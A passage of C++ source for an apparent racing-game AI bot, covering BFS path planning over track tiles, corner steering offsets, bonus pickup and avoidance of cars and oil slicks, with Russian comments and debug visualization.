move.setUseNitro(true);\r\n#ifdef vis\r\n //cout << \"VISUALIZATION\\n\";\r\n //cout.flush();\r\n for (int i = 0; i < a.size(); ++i)\r\n for (int j = 0; j < a[0].size(); ++j)\r\n if (a[i][j] == UNKNOWN)\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0xCC0000);\r\n else if (visited[i][j])\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0x008800);\r\n for (auto p : wp)\r\n visual.fillRect(get(p[0]), get(p[1]), get(p[0] + 1), get(p[1] + 1), 0x0000CC);\r\n\r\n visual.fillRect(get(ti), get(tj), get(ti + 1), get(tj + 1), 0x008888);\r\n visual.endPre();\r\n visual.beginPost();\r\n visual.circle(getCenter(ti), getCenter(tj), 600, 0x54618f);\r\n visual.line(self.getX(), self.getY(), nextWaypointX, nextWaypointY);\r\n char sss[45];\r\n sprintf(sss, \"%d %d s:%.2f a:%.2f t:%.2f\", pd, d, speedModule, angleToWaypoint, turn);\r\n visual.text(self.getX() + 120, self.getY() + 120, sss);\r\n sss[44] = 0;\r\n //char qqq[35];\r\n //int ttt = 0;\r\n //for (auto ee : bad)\r\n //ttt += sprintf(qqq + ttt, \"%d %d, \", ee.first, ee.second);\r\n //for (int i = 0; i < 35; ++i)\r\n //qqq[i] = ' ';\r\n //qqq[34] = 0;\r\n //visual.text(self.getX() + 120, self.getY() + 200, qqq);\r\n for (int i = 1; i < min(10, int(path.size())); ++i)\r\n visual.line(getCenter(path[i - 1].first), getCenter(path[i - 1].second), getCenter(path[i].first), getCenter(path[i].second), 0xff0000);\r\n visual.line(getCenter(pi), getCenter(pj), getCenter(ti), getCenter(tj), 0x00ff00);\r\n visual.line(getCenter(ti), getCenter(tj), getCenter(fi), getCenter(fj), 0x00ff00);\r\n visual.fillCircle(getCenter(ti), getCenter(tj), 10);\r\n visual.endPost();\r\n#endif\r\n //cout << \"END OF MOVE\\n\";\r\n //cout.flush();\r\n }\r\n\r\n else //надо было думать раньше\r\n {\r\n#define changed changedj \r\n#define distToNext distToNextij \r\n#define prevDistance prevDistanceij \r\n#define countOfFails countOfFailsj \r\n#define forceBack forceBackj \r\n#define forceRight forceRightj \r\n#define force forcej \r\n#define prevx prevxj \r\n#define currx currxj \r\n#define forceSlow forceSlowj \r\n#define globalFail globalFailj \r\n#define turn turnj \r\n#define power powerj \r\n#define init initj \r\n#define snake snakej \r\n#define drift driftj \r\n#define width widthj \r\n#define height heightj \r\n#define d dj \r\n#define pd pdj \r\n#define bad badj\r\n#define old oldj\r\n#define planB planBj \r\n#define visited visitedj\r\n#define once oncej\r\n#ifdef vis\r\n visual.beginPre();\r\n#endif\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n if (init)\r\n {\r\n FU = goforward;\r\n //мне стало лень думать\r\n if (world.getMapName() == \"map07\" || world.getMapName() == \"map08\" || world.getMapName() == \"map14\")\r\n FUUUUU = goforward;\r\n old.push_back({self.getX() / tileSize, self.getY() / tileSize});\r\n //cout << self.getX() << \" \" << self.getY() << \"\\n\";\r\n init = false;\r\n width = self.getWidth() / 2;\r\n height = self.getHeight() / 2;\r\n visited.resize(a.size());\r\n once.resize(a.size());\r\n for (int i = 0; i < visited.size(); ++i)\r\n visited[i].resize(a[0].size(), false),\r\n once[i].resize(a[0].size(), false);\r\n d = getDirectionByAngle(self.getAngle());\r\n pd = d;\r\n //cout << self.getAngle() << \" ANGLE \" << pd << \" \" << d << \"\\n\";\r\n#ifdef debug\r\n writeln(world.getWaypoints());\r\n#endif\r\n srand(game.getRandomSeed());\r\n }\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int qx = self.getX() / tileSize;\r\n int qy = self.getY() / tileSize;\r\n int wx, wy;\r\n tie(wx, wy) = old.back();\r\n if (wx != qx || wy != qy)\r\n {\r\n //cout << wx << \" \" << wy << \" \" << qx << \" \" << qy << \" \" << pd << \" \" << d << \"\\n\";\r\n old[0] = {qx, qy};\r\n pd = d;\r\n d = directions[make_pair(qx - wx, qy - wy)];\r\n //int tqwer = getDirectionByAngle(self.getAngle());\r\n if (pd != d && a[self.getNextWaypointX()][self.getNextWaypointY()] != UNKNOWN && waypointIndex != 0)\r\n FU = FUUUUU;\r\n //if (tqwer != -1)\r\n //d = tqwer;\r\n //if (forceBack)\r\n //d = opposite(d);\r\n }\r\n\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx != 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n for (int i = 0; i < min(3, int(wp.size())); ++i)\r\n wp.push_back(wp[i]);\r\n int fi, fj, pi, pj;\r\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\r\n //if (waypointIndex < int(wp.size()) - 1)\r\n //{\r\n //int cx = int(self.getX() / tileSize);\r\n //int cy = int(self.getY() / tileSize);\r\n //int wx1 = wp[waypointIndex][0];\r\n //int wx2 = wp[waypointIndex + 1][0];\r\n //int wy1 = wp[waypointIndex][1];\r\n //int wy2 = wp[waypointIndex + 1][1];\r\n //if (\r\n //(cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n //||\r\n //(cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n //)\r\n //ti = wp[++waypointIndex][0],\r\n //tj = wp[waypointIndex][1];\r\n //if (waypointIndex + 1 < int(wp.size()))\r\n //fi = wp[waypointIndex + 1][0],\r\n //fj = wp[waypointIndex + 1][1];\r\n //}\r\n double targetX = getCenter(ti);\r\n double targetY = getCenter(tj);\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n pair<int, int> S = make_pair(si, sj);\r\n visited[si][sj] = true;\r\n vector<int> qwerqsdfgsdf = {si, sj};\r\n if (wp[max(0, self.getNextWaypointIndex() - 1)] == qwerqsdfgsdf && !once[si][sj])\r\n {\r\n once[si][sj] = true;\r\n for (int i = 0; i < visited.size(); ++i)\r\n for (int j = 0; j < visited[0].size(); ++j)\r\n visited[i][j] = false;\r\n }\r\n if (bad.find(S) == bad.end())\r\n bad.clear();\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n#ifdef debug\r\n writeln(\"GET\", si, sj, tti, ttj, waypointIndex);\r\n#endif\r\n auto fffpath = [](int si, int sj, int u, int v, vector<vector<pair<int, int>>> prev)\r\n {\r\n vector<pair<int, int>> path;\r\n while (u != si || v != sj)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back({si, sj});\r\n reverse(path.begin(), path.end());\r\n return path;\r\n };\r\n auto bfs = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n queue<vertex> q;\r\n q.push(vertex(si, sj, pd, dd));\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n int u, v, prevD, prevprevD;\r\n while (q.size())\r\n {\r\n u = q.front().x;\r\n v = q.front().y;\r\n prevD = q.front().qd;\r\n prevprevD = q.front().qpd;\r\n q.pop();\r\n if (a[u][v] == UNKNOWN)\r\n continue;\r\n vector<int> dx;\r\n vector<int> dy;\r\n for (int i = 0; i < 4; ++i)\r\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\r\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\r\n for (int i = 0; i < 4; ++i)\r\n {\r\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\r\n {\r\n int isReverse = opposite(prevD, iAmIdiot);\r\n int isShpilka = opposite(prevprevD, iAmIdiot);\r\n int temp = d[u][v] + 1 + isShpilka * 3 + isReverse * 6;\r\n if (d[u + dx[i]][v + dy[i]] > temp)\r\n {\r\n d[u + dx[i]][v + dy[i]] = temp;\r\n prev[u + dx[i]][v + dy[i]] = {u, v};\r\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot));\r\n }\r\n }\r\n }\r\n }\r\n return make_pair(d, prev);\r\n };\r\n auto qqwerwer = bfs(si, sj, ti, tj, pd, d, FUUUUU);\r\n auto d = qqwerwer.first;\r\n int u, v;\r\n auto prev = qqwerwer.second;\r\n {\r\n u = tti;\r\n v = ttj;\r\n //ppp(d);\r\n int known = 10000;\r\n if (d[tti][ttj] != 10000)\r\n known = fffpath(si, sj, tti, ttj, bfs(si, sj, tti, ttj, pd, dd, FUUUUU).second).size();\r\n int ytrewq = d[tti][ttj] == 10000 || (known / 2 > (abs(si - tti) + abs(sj + ttj)));\r\n if (ytrewq)\r\n {\r\n int indexi = -1;\r\n int indexj = -1;\r\n int mn = 11234123;\r\n for (int i = 0; i < d.size(); ++i)\r\n for (int j = 0; j < d[0].size(); ++j)\r\n if (d[i][j] < 10000)\r\n {\r\n int length = fffpath(si, sj, i, j, bfs(si, sj, i, j, pd, dd, FUUUUU).second).size();\r\n bool hasGoodNeighbor = false;\r\n for (int dx = -1; dx < 2; ++dx)\r\n for (int dy = -1; dy < 2; ++dy)\r\n if (abs(dx + dy) == 1)\r\n hasGoodNeighbor |= ok(i + dx, a.size()) && ok(j + dy, a[0].size()) && a[i + dx][j + dy] == UNKNOWN;\r\n#ifdef vis\r\n if (hasGoodNeighbor)\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0xff00ff);\r\n else\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0x00ffff);\r\n#endif\r\n int gamno = abs(i - tti) + abs(j - ttj) + length;\r\n if ((gamno < mn || (gamno == mn && abs(si - i) + abs(sj - j) < abs(si - indexi) + abs(sj - indexj))) && !visited[i][j] && hasGoodNeighbor)\r\n mn = gamno,\r\n indexi = i,\r\n indexj = j;\r\n }\r\n if (indexi == -1)\r\n cout << \"FAAAAAAAAAAAAAIL\\n\";\r\n else\r\n //cout << \"indices == \" << indexi << \" \" << indexj << \"\\n\",\r\n u = ti = indexi,\r\n v = tj = indexj,\r\n#ifdef vis\r\n visual.fillCircle(getCenter(tti), getCenter(ttj), 600, 0x555555),\r\n#endif\r\n targetX = getCenter(ti),\r\n targetY = getCenter(tj);\r\n }\r\n auto path = fffpath(si, sj, u, v, prev);\r\n if (ytrewq)\r\n path.push_back({-1, -1});\r\n return path;\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path;\r\n int qqq = ti;\r\n int www = tj;\r\n path = getPath(si, sj, ti, tj, pd, d, FU);\r\n for (int i = 0; i + 4 < min(7, int(path.size())); ++i)\r\n if (\r\n (\r\n isVertical(path[i + 0], path[i + 1]) &&\r\n isVertical(path[i + 2], path[i + 3]) &&\r\n isHorizontal(path[i + 0], path[i + 3]) &&\r\n isHorizontal(path[i + 1], path[i + 2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[i + 0], path[i + 1]) &&\r\n isHorizontal(path[i + 2], path[i + 3]) &&\r\n isVertical(path[i + 0], path[i + 3]) &&\r\n isVertical(path[i + 1], path[i + 2])\r\n )\r\n )\r\n {\r\n path = getPath(si, sj, qqq, www, pd, d, goforward);\r\n break;\r\n }\r\n cout << \"RAW PATH = \\n\" << path;\r\n int ai, aj, bi, bj, ci, cj, di, dj;\r\n auto banana = path.back();\r\n if (banana.first == -1)\r\n cout << \"banana\\n\";\r\n else\r\n cout << \"!banana\\n\";\r\n if (banana.first == -1)\r\n path.pop_back();\r\n else\r\n while (waypointIndex + 1 < int(wp.size()))\r\n {\r\n banana = path.back();\r\n if (banana.first == -1)\r\n path.pop_back();\r\n int t = 0;\r\n int y = 0;\r\n auto zxcv = path.back();\r\n auto asdf = path.back();\r\n auto qwer = path.back();\r\n if (path.size() >= 2)\r\n asdf = path[path.size() - 2];\r\n if (path.size() >= 3)\r\n zxcv = path[path.size() - 3];\r\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\r\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\r\n if (path.size() < 3)\r\n t = d;\r\n int q = wp[waypointIndex][0];\r\n int w = wp[waypointIndex][1];\r\n int e = wp[waypointIndex + 1][0];\r\n int r = wp[waypointIndex + 1][1];\r\n auto temp = getPath(q, w, e, r, t, y, FU);\r\n banana = temp.back();\r\n if (banana.first == -1)\r\n temp.pop_back();\r\n if (temp.size() <= 1)\r\n break;\r\n for (auto x : temp)\r\n path.push_back(x);\r\n waypointIndex++;\r\n }\r\n for (int i = 1; i < int(path.size()); ++i)\r\n if (path[i] == path[i - 1])\r\n path.erase(path.begin() + --i);\r\n //for (int i = 0; i + 5 < int(path.size()); ++i)\r\n //{\r\n //auto s = path[i];\r\n //auto d = path[i + 1];\r\n //auto f = path[i + 2];\r\n //auto g = path[i + 3];\r\n //auto h = path[i + 4];\r\n //auto j = path[i + 5];\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //cout << \"EPIC WIN\\n\",\r\n //path[i + 2] = {d.first + 1, d.second};\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //path[i + 2] = {d.first + 1, d.second};\r\n\r\n //}\r\n auto checkBonus = path;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if ((abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1) || path[i - 1] == path[i + 1])\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n //writeln();\r\n //writeln(xxx);\r\n //writeln();\r\n }\r\n#endif\r\n //fi = ti;\r\n //fj = tj;\r\n tie(ti, tj) = path[i];\r\n targetX = getCenter(path[i].first);//(path[i].first + 0.5) * tileSize;\r\n targetY = getCenter(path[i].second);//(path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n#ifdef debug\r\n wr(path);\r\n cout.flush();\r\n#endif\r\n if (path.size() >= 3)\r\n {\r\n tie(ai, aj) = path[0];\r\n tie(bi, bj) = path[1];\r\n tie(ci, cj) = path[2];\r\n }\r\n if (path.size() >= 4) //SNAKE\r\n {\r\n tie(di, dj) = path[3];\r\n snake = true;\r\n if (\r\n (ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 == dj)\r\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\r\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\r\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj)\r\n )\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n else\r\n {\r\n drift = true;\r\n snake = false;\r\n if (\r\n (\r\n isVertical(path[0], path[1]) &&\r\n isVertical(path[2], path[3]) &&\r\n isHorizontal(path[0], path[3]) &&\r\n isHorizontal(path[1], path[2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[0], path[1]) &&\r\n isHorizontal(path[2], path[3]) &&\r\n isVertical(path[0], path[3]) &&\r\n isVertical(path[1], path[2])\r\n )\r\n )\r\n {\r\n bad.insert(path[1]);\r\n if (d != directions[make_pair(path[1].first - path[0].first, path[1].second - path[0].second)])\r\n bad.insert(path[0]);\r\n bad.insert(path[2]);\r\n //if (self.getDistanceTo(getCenter(path[1].first), getCenter(path[1].second)) < tileSize)\r\n tie(targetX, targetY) = getCorner(path[0], path[1], path[2]);\r\n }\r\n else\r\n drift = false;\r\n }\r\n } else\r\n drift = false,\r\n snake = false;\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;//идеально при малой скорости\r\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\r\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1)\r\n + 0.2; //на скорости влезает, но задевает угол ~-2\r\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n if (temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n if (temp2 < 0.6)\r\n MAAAAAGIC = interpolation(0.6);\r\n bool found = false;\r\n for (int i = 0; i < int(path.size()); ++i)\r\n if (path[i].first == ti && path[i].second == tj)\r\n {\r\n pi = path[max(0, i - 1)].first;\r\n pj = path[max(0, i - 1)].second;\r\n fi = path[min(int(path.size()) - 1, i + 1)].first;\r\n fj = path[min(int(path.size()) - 1, i + 1)].second;\r\n found = true;\r\n break;\r\n }\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n //auto pathtitj = getPath(ti, tj, fi, fj);\r\n //if (pathtitj.size() >= 2)\r\n //fi = pathtitj[1].first,\r\n //fj = pathtitj[1].second;\r\n //else\r\n //fi = ti,\r\n //fj = tj;\r\n#ifdef debug\r\n wr(si, sj, pi, pj, ti, tj, fi, fj);\r\n cout.flush();\r\n //writeln(pathtitj);\r\n //writeln();\r\n#endif\r\n auto changeCoords = [&](int i, int j) {\r\n if (snake || drift)\r\n return;\r\n if (pj == tj)\r\n swap(pi, fi),\r\n swap(pj, fj);\r\n switch (a[i][j]) \r\n {\r\n case LEFT_TOP_CORNER:\r\n lt:\r\n //a[i][j] = LEFT_TOP_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\n rt:\r\n //a[i][j] = RIGHT_TOP_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\n lb:\r\n //a[i][j] = LEFT_BOTTOM_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\n rb:\r\n //a[i][j] = RIGHT_BOTTOM_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\n th:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rb, lb);\r\n break;\r\n case BOTTOM_HEADED_T:\r\n bh:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rt, lt);\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, lb, lt);\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, rb, rt);\r\n break;\r\n case CROSSROADS:\r\n if (pi == ti && pi == fi);\r\n else if (pj == tj && pj == fj);\r\n else go(pj + 1 == tj, th, bh);\r\n default:\r\n break;\r\n }\r\n };\r\n changeCoords(ti, tj);\r\n bool B = false;\r\n double bonusMin = 1000000;\r\n Bonus bonus;\r\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\r\n for (Bonus b : world.getBonuses())\r\n if (self.getDistanceTo(b) < distToNext)\r\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && fabs(self.getAngleTo(b)) < PI / 27) && fabs(self.getAngleTo(targetX, targetY) < PI / 36) && self.getDistanceTo(b) > tileSize)\r\n {\r\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == bbb)\r\n {\r\n B = true;\r\n if (bonusMin > self.getDistanceTo(b))\r\n bonus = b,\r\n bonusMin = self.getDistanceTo(b);\r\n }\r\n }\r\n }\r\n if (B)\r\n {\r\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\r\n nextWaypointX = bonus.getX();\r\n nextWaypointY = bonus.getY();\r\n nextWaypointX = min(nextWaypointX, get(bbb.first + 1) - height - bonus.getWidth() / 2 - 78);\r\n nextWaypointX = max(nextWaypointX, get(bbb.first) + height + bonus.getWidth() / 2 + 78);\r\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\r\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\r\n }\r\n if (is32(path))\r\n tie(nextWaypointX, nextWaypointY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\r\n\r\n auto cars = world.getCars();\r\n sort(cars.begin(), cars.end(), [&self](const Car& aaa, const Car& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (Car car : world.getCars())\r\n if (!car.isFinishedTrack() && !car.isTeammate())\r\n if (hypot(car.getSpeedX(), car.getSpeedY()) * 1.2 < speedModule || fabs(car.getAngleTo(self)) < PI / 2 || speedModule < 10 && world.getTick() > 300)\r\n {\r\n pair<int, int> ccc = {car.getX() / tileSize, car.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && (self.getDistanceTo(car) > tileSize || speedModule < 10))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= car.getX() || targetX >= self.getX() && self.getX() >= car.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n double lower2 = car.getY() - height - 15 - car.getWidth();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = car.getY() + height + 15 + car.getWidth();\r\n double cgy = car.getY();\r\n double dist1 = self.getDistanceTo(car.getX(), lower) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(car.getX(), lower2) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(car.getX(), upper) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(car.getX(), upper2) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper2);\r\n nextWaypointX = car.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= car.getY() || targetY >= self.getY() && self.getY() >= car.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = car.getX() - height - 15 - car.getWidth();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = car.getX() + height + 15 + car.getWidth();\r\n double cgy = car.getX();\r\n double dist1 = self.getDistanceTo(car.getY(), lower) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(car.getY(), lower2) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(car.getY(), upper) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(car.getY(), upper2) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper2);\r\n nextWaypointY = car.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n auto os = world.getOilSlicks();\r\n sort(os.begin(), os.end(), [&self](const OilSlick& aaa, const OilSlick& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (auto o : os)\r\n {\r\n pair<int, int> ccc = {o.getX() / tileSize, o.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && self.getDistanceTo(o) > tileSize && self.getDistanceTo(o) < self.getDistanceTo(nextWaypointX, nextWaypointY))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= o.getX() || targetX >= self.getX() && self.getX() >= o.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n double lower2 = o.getY() - height - 15 - o.getRadius();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = o.getY() + height + 15 + o.getRadius();\r\n double cgy = o.getY();\r\n double dist1 = self.getDistanceTo(o.getX(), lower) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(o.getX(), lower2) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(o.getX(), upper) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(o.getX(), upper2) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper2);\r\n nextWaypointX = o.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= o.getY() || targetY >= self.getY() && self.getY() >= o.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = o.getX() - height - 15 - o.getRadius();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = o.getX() + height + 15 + o.getRadius();\r\n double cgy = o.getX();\r\n double dist1 = self.getDistanceTo(o.getY(), lower) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(o.getY(), lower2) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(o.getY(), upper) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(o.getY(), upper2) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper2);\r\n nextWaypointY = o.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n //double check = self.getAngleTo(getCenter(ti), getCenter(tj));\r\n //if ((fabs(check - PI) < PI / 6 || fabs(check + PI) < PI / 6) && planB == 0)\r\n //planB = PLANB,\r\n //power *= -1;\r\n //if (fabs(check) < PI / 3 && planB)\r\n //power *= -1,\r\n //planB = 0;\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (forceBack == 0 && forceRight == 0)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n //if (planB)\r\n //planB = 0,\r\n //power *= -1,\r\n //forceRight = FORCE_RIGHT;\r\n //else\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(a[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 1 